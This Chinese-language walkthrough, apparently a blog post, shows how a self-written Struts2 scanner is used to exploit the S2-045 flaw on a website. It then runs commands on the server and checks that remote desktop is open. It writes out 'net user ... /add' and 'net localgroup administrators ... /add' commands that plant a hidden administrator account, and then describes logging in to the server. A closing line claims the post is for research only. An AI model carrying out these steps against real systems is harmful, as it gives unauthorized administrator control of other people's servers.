Struts2版本系列漏洞检查工具提权服务器验证过程

Struts2版本系列漏洞检查工具提权服务器验证过程

通过我们编写的Struts2版本系列漏洞检查工具

来进行对漏洞的验证

该网站存在struts045的漏洞

那么我们先获取到whoami的信息

发现是系统权限，那么查看开放的端口？

我们发现3389是打开的

那么我们就可以建立一个用户并加入到管理员组

如net user 0x80 0x80890^&*/%(P /add & net localgroup administrators 0x80 /add

在命令输入net user 0x80 0x80890^&*/%(P /add & net localgroup administrators 0x80 /add

点击执行

接着我们返回查看用户信息

发现执行错误，那我们就单个执行

net user 0x80 0x80890^&*/%(P /add

net localgroup administrators 0x80 /add

发现已经成功建立了一个0x80的用户，我们看下是什么权限

接着加入管理员权限

net localgroup administrators 0x80 /add

点击执行

查看0x80的权限

是管理员权限，接着我们连接服务器，输入提权的用户密码

这里存在一个中文乱码的问题，需要弄成gb2312即可

net user 0x80 ghjA*(aA /add

点击确定

我们已经成功进入服务器

注意：只做技术研究，不做破坏！